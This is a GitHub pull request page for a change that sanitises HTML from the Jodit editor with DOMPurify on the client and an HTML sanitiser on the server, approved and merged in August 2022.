Skip to content

DLSV2-637 Sanitise html strings submitted to database using Jodit edi… #1373

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Merged
merged 6 commits into from
Aug 26, 2022
Merged

DLSV2-637 Sanitise html strings submitted to database using Jodit edi… #1373

merged 6 commits into from
Aug 26, 2022

Conversation

@manishagarwalnhs
Copy link
Contributor

@manishagarwalnhs manishagarwalnhs commented Aug 25, 2022
edited by kevwhitt-hee
Loading

…tor throughout solution

JIRA link

DLSV2-637

Description

The html editor is sanitised to only allow clean html send to the server. At the server, the html string is again sanitised to make sure no risky html is eventually saved in the database. This is done using the dompurify library at client side and HTMLSanitizer package on the server side. The server side only removes iframe and img html tags but this can be changed to add more html tags if we want to.

Screenshots

No Screenshots available

Developer checks

I have:

  • Run the formatter and made sure there are no IDE errors.
  • Written tests for the changes (accessibility tests, unit tests for controller, data services, services, view models, etc)
  • Manually tested my work with and without JavaScript. Full manual testing guidelines can be found here: https://softwiretech.atlassian.net/wiki/spaces/HEE/pages/6703648740/Testing
  • Updated/added documentation in Swiki and/or Readme. Links (if any) are below:
  • Updated my Jira ticket with information about other parts of the system that were touched as part of the MR and have to be sanity tested to ensure nothing’s broken.
  • Scanned over my own MR to ensure everything is as expected.

kevwhitt-hee
kevwhitt-hee approved these changes Aug 26, 2022
View reviewed changes
Copy link
Contributor

@kevwhitt-hee kevwhitt-hee left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Added yarn-lock file, updated version of dom-purify and fixed TypeScript lint errors. Tested with JS and non-JS and <script> tags get reliably stripped before storing HTML to database. Great work.

@kevwhitt-hee kevwhitt-hee merged commit eccf652 into master Aug 26, 2022
@kevwhitt-hee kevwhitt-hee deleted the DLSV2-614 branch August 26, 2022 15:10
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@kevwhitt-hee kevwhitt-hee kevwhitt-hee approved these changes

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

3 participants

@manishagarwalnhs @kevwhitt-hee @manishagarwalEviden